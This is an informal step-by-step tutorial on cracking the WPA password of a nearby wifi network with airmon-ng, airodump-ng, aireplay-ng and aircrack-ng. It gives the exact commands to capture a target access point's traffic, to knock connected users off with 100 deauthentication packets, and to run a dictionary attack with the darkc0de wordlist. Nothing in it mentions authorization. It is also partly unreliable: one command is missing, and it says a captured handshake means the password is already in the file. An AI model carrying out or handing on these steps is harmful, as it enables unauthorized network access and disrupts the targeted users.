Firts disconnect from connected wifi network.
Then type in terminal
airmon-ng start $your-wifi-interface
You should get new interface named mon0 (from MONitor-interface0) or something like that.
Scan close networks with
Focus on closest network with strongest signal. Let it work and do not close terminal.As low is PWR it closest is the AP.We need the BSSID and channel to do this.Open another terminal and type:
airodump-ng –bssid 10:FE:ED:0B:6A:A6 -c 1 –write WPAcrack mon0
–bssid is AP’s wifi Macaddress.
-c is channedl
–write WPAcrack – creating file with critical data about wifi network
and mon0 is our wifi interface for monitoring.
Let it colect data for about 2-3 hours, or when #DATA get close to 25000.As many clients we have connected,the easy will be for us to get the password.
Now it is time to deauth some clients.In this way they will automaticly reconnect to their network, but we will able to get some critical data about password.Let’s open another terminal and type:
aireplay-ng –deauth 100 -a 10:FE:ED:0B:6A:A6 mon0 (–ignore-negative-one)
–deauth 100 – how many times we want to deauth clients
-a bssid of AP
We bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake.
In terminal with command airodump-ng mon0 we shall see WPA HANDSHAKE ,This means we got AP password in our file.This process may take a long time.Take a nap.
Finaly we have to crack password now form collected data in our file
aircrack-ng WPAcrack-01.cap -w /srv/data/darkc0de
Yes it a dictionary crack. And yes and this step may take a while.
I will use darkcOde from backtrack wordlist.